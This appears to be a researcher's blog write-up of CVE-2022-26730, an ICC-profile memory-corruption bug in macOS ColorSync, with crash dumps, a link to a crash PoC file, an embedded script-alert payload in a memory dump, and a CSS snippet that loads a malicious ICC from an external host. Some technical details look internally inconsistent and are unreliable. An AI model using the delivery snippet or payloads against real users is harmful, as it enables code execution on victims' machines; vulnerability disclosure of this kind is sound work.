Security Research & Defense

Hoyt LLC

CVE-2022-26730 | ColorSync

CVE-2022-26730 | ColorSync | Hoyt LLC | A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation.
>> Home » Blog » CVE-2022-26730 | ColorSync

Estimated reading time: 7 minutes

Table of contents

Executive Summary

CVE-2022-26730 | ColorSync | A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.

Patch Available for: Mac Studio (2022), Mac Pro (2019 and later), MacBook Air (2018 and later), MacBook Pro (2017 and later), Mac mini (2018 and later), iMac (2017 and later), MacBook (2017), and iMac Pro (2017).

CVE-2022-26730

A memory corruption issue existed in the processing of ICC profiles

https://support.apple.com/en-us/HT213488

NIST CVSS 3.1 Severity and Metrics: 8.8 High

Prior Art

Google Project Zero identified an out-of-bounds reads due to integer overflows in curve table initialization issue detailed in P0-2226 as CVE-2021-30942.

The issue described in this report was found in the CMMLutTag::InitializeCurveTable method, as called by CMMLutTag::CMMLutTag during the initialization of A2B0/B2A0 tags of type mAB/mBA. The curve table consists of a number of curves of type ‘para’ (parametricCurveType) or ‘curv’ (curveType). The latter is represented in the color profile with the following structures (copied from https://www.color.org/icProfileHeader.h):

https://bugs.chromium.org/p/project-zero/issues/detail?id=2226

CVE-2022-26730 | ColorSync

TL;DR

CVE-2022-26730 | ColorSync | Found via PoC Replay of P0-2226 and disassembly of Patch for CVE-2021-30942

CVSS 3.1 Base Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Targets

  • (1) ColorSync, Safari, Finder, Instruments and other Applications using ICC Profiles or Graphics Files with ICC Profiles on macOS 12
  • (2) Apple Developer Instruments programs had memory bugs issues fixed in macOS 13 as a Result of Feedback Reports: 21E258 | 13E113 | Instruments | Crash | .icc | ColorSync | PoC | OE089308559899 | FB9970176 | FB9970191 | FB9971897

Bugs

Buffer Overflow

The ucr_string variable is allocated only 100 bytes, but its length is being computed using strlen which can lead to buffer overflow if the string exceeds 100 bytes. An attacker can exploit this vulnerability to execute arbitrary code or crash the application.

Memory Leak

The ucrBgWrite variable is allocated dynamically using malloc, but it is not being freed. If this code is called repeatedly, it could lead to memory exhaustion and potentially cause the system to crash.

Data Corruption

The memcpy function is used to copy the ucr_string into memory, but it does not check the length of the data being copied. If the string_bytes variable is greater than the available space in memory, it could result in data corruption, memory access violation, or a segmentation fault.

Integer Overflow

The ucr_nbytes and bg_nbytes variables are computed by multiplying the number of elements in the curve by the size of each element. When the number of elements in the curve is large enough, it results in integer overflow and causes unexpected behavior.

Type Casting

The ucrCurve and bgCurve variables are being cast to icUcrBgCurve type, which assumes that the memory block contains a valid structure of that type. If the memory block is corrupted or does not contain a valid structure of that type, it could result in undefined behavior, including program crashes or memory access violations.

ICC Profile | ColorSync::CMMLutTag::InitializeCurveTable

CVE-2022-26730 | ColorSync makes use of several Objective-C method names (SetPlotColor:, SetPlotNone, SetPlotPara:Type:, and SetPlotData:entryCount:entrySize:) implementing control flows that involve checking values of several registers and jumping to different parts of the code based on those values that were User Controllable Inputs.

CVE-2022-26730

The Multi-localized Strings Code provided attack surface via buffer overflow as shown below:

CVE-2022-26730 | CMMLutTag::CMMLutTag within the Multi-localized Strings Code

ColorSync Vulnerability Analysis

The crash occurred in the ColorSync Utility application on macOS version 12.3. The crash occurred on March 29, 2022, while the application was running on an ARM-64 CPU.

The application (ColorSync Utility) crashed due to a segmentation fault. The crash occurred while executing the inputPopHit method of an NSPopUpButton control. The crash log also includes a kernel targe section with several VM – pmap_enter failed with resource shortage messages.

Vulnerable Code Highlights | CMMLutTag::InitializeCurveTable

CMMLutTag::InitializeCurveTable(CMMLutTag::CMMCurveTable&, CMMMemMgr&, unsigned int, unsigned int, CMMTagDataAccess*, unsigned int*)  (in ColorSync)

X86_64 Disassembly of ColorSync::CMMLutTag::InitializeCurveTable

Shown below is the proof of concept [PoC] code for CVE-2022-26730 | ColorSync copied to the ColorSync::CMMLutTag::InitializeCurveTable function. The ColorSync::CMMLutTag::InitializeCurveTable function is responsible for setting some plot-related properties, such as color and type, based on input parameters.

The ColorSync::CMMLutTag::InitializeCurveTable function begins by saving the stack base pointer and then pushing the values of several registers onto the stack. It then allocates memory on the stack and initializes some local variables. The function then calls two other functions (SetPlotColor: and SetPlotNone) with input parameters rdi and rsi and stores the results in rsi and r14 on X86_64, respectively.

ColorSync::CMMLutTag::InitializeCurveTable::SetPlotData:entryCount:entrySize, SetPlotColor and others are User controllable Inputs to the curvParameters. A lack of proper input validation or sanitization leads to a situation where an attacker can control the value of the %eax register on X86_64 or s20 + s21 registers on arm64e. By providing a crafted input, an attacker can cause a crash or potentially execute arbitrary code with the privileges of the ColorSync Utility process.

arm64e s20 Register
0x6f004300 : o C
0x79007000 : y p
0x69007200 : i r
0x68006700 : h g

0x20007400 :   t
0x30003200 : 0 2
0x32003200 : 2 2
0x44002000 : D  

0x76006100 : v a
0x64006900 : d i
0x48002000 : H  
0x79006f00 : y o

0x20007400 :   t
0x70002200 : p "
0x69007200 : i r
0x74006e00 : t n

0x68002000 : h  
0x6c006500 : l e
0x6f006c00 : o l
0x77002000 : w  

0x72006f00 : r o
0x64006c00 : d l
0x20002200 :   "
0x73003c00 : s <

0x72006300 : r c
0x70006900 : p i
0x3e007400 : > t
0x6c006100 : l a

0x72006500 : r e
0x28007400 : ( t
0x36003600 : 6 6
0x29003600 : ) 6

0x2f003c00 : / <
0x63007300 : c s
0x69007200 : i r
0x74007000 : t p

0x22003e00 : " >
Buffer Overflow

The memory contents at this buffer address are repetitive, with the same value (0x61006100) repeated multiple times. This value corresponds to the UTF-16 encoding of the character “a” twice:

(lldb) x/500 
0x1c5c881cc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881dc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881ec: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881fc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8820c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8821c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8822c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8823c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8824c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8825c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8826c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8827c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8828c: 0x61006100 0x61006100
X86_64 Registers
CVE-2022-27630 ICC Color Profile Arbitrary Data Read macOS 12 curv parameters
CVE-2022-27630 ICC Color Profile Arbitrary Data Read macOS 12 curv parameters

Sample Profile

Graphical View of a PoC ICC Color Profile for CVE-2022-26730 | ColorSync showing the curveParameters using ColorSync:

The curveType is represented in the color profile as defined in https://www.color.org/icProfileHeader.h such as ToA0Tag, AToB0Tag, A2B2, A2B1 and other Tags and Sizes.

CVE-2022-26730 | ColorSync | PoC

Attack Styles

WateringHole, SpearPhishing, EmailBomb, Cross Site Scripting, Other

The Public Domain CVE-2022-26730 | ColorSync PoC Released today is a hand rolled ICC to Crash ColorSync [macOS 12] on a Null Byte Read in the curv parameters at URL https://xss.cx/2022/11/05/icc/Crash-CoreFoundation-CFDataGetLength-ColorSync-Crash-PoC-hand-crafted-to-hit-null-page-0x00-public-domain.icc.zip

ICC Profile Fuzzing Container

// Example | Sample
<rdf:Description rdf:about='cve-2022-26730-arbitrary-code-execution-user-controllable-input.png'
...
 <System:FileName>cve-2022-26730-arbitrary-code-execution-curv-input-parameters-unsanitized.png</System:FileName>
...
 <File:FileType>PNG</File:FileType>
 <File:FileTypeExtension>png</File:FileTypeExtension>
 <File:MIMEType>image/png</File:MIMEType>
...
 <PNG:RedX>0.64</PNG:RedX>
 <PNG:RedY>0.33</PNG:RedY>
 <PNG:GreenX>0.3</PNG:GreenX>
 <PNG:GreenY>0.6</PNG:GreenY>
 <PNG:BlueX>0.15</PNG:BlueX>
 <PNG:BlueY>0.06</PNG:BlueY>
...
 <PNG:Icccopyright>Copyright 2022 David Hoyt LLC</PNG:Icccopyright>
 <PNG:Iccdescription>e-sRGB</PNG:Iccdescription>
 <ICC-header:ProfileCMMType>Hoyt</ICC-header:ProfileCMMType>
 <ICC-header:ProfileVersion>6.6.6</ICC-header:ProfileVersion>
 ...
 <ICC_Profile2:AToB0 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:AToB0>
 <ICC_Profile2:AToB2 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:AToB2>
 <ICC_Profile2:AToB1 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:AToB1>
 <ICC_Profile2:BToA0 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:BToA0>
 <ICC_Profile2:BToA2 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:BToA2>
 <ICC_Profile2:BToA1 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:BToA1>
...
CVE-2022-26730 ICC Profile Fuzzing ContainerDownload

Use Case

Case #1: Attacker hand rolls an ICC Color Profile named bad.icc then Embedded in sample.png and Campaigned

Case #2 Attacker crafts HTML File with Reference to the Malicious ICC or Graphics Picture and Campaigned

HTML Exploit Delivery Container

@media color-gamut: p2{
  @color-profile{ name: p3; src: url(hxxps://xss.cx/..path.part../icc/cve-2022-26730-arbitrary-code-execution-user-controllable-input-poc-1.icc); }

HTML Exploit Delivery PoC

Crash Reports

arm64e SIGSEV-11Download
SIGFPE-Crash-heapDownload
arm64e pmap_enter Download
X86_64 SIGBUS Crash leaks | macOS 12Download
SIGBUS Crash malloc_history | macOS 12Download

Timeline

  • Keywords: CVE-2022-26730 | ColorSync | ICC Color Profile, User Controllable Input, Input Validation, Mac, PoC
  • Operating System: macOS 12
  • Vendor Notification: March 2022
  • Vendor Resolution: October 2022
  • Vendor Fix: This issue was addressed with improved input validation by Apple
  • Vendor Source: https://support.apple.com/en-us/HT213488
  • Published: 10/31/2022
  • (Data Abort) byte read Translation fault
  • Bug Type == Incomplete Fix

Knowledgebase

https://bugs.chromium.org/p/project-zero/issues/detail?id=2226

Issue 2226: Apple ColorSync: out-of-bounds reads due to integer overflows in curve table initialization

https://bugs.chromium.org/p/project-zero/issues/detail?id=2225

Issue 2225: Apple ColorSync: use of uninitialized memory in CMMNDimLinear::Interpolate

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26730

https://nvd.nist.gov/vuln/detail/CVE-2022-26730

%d bloggers like this: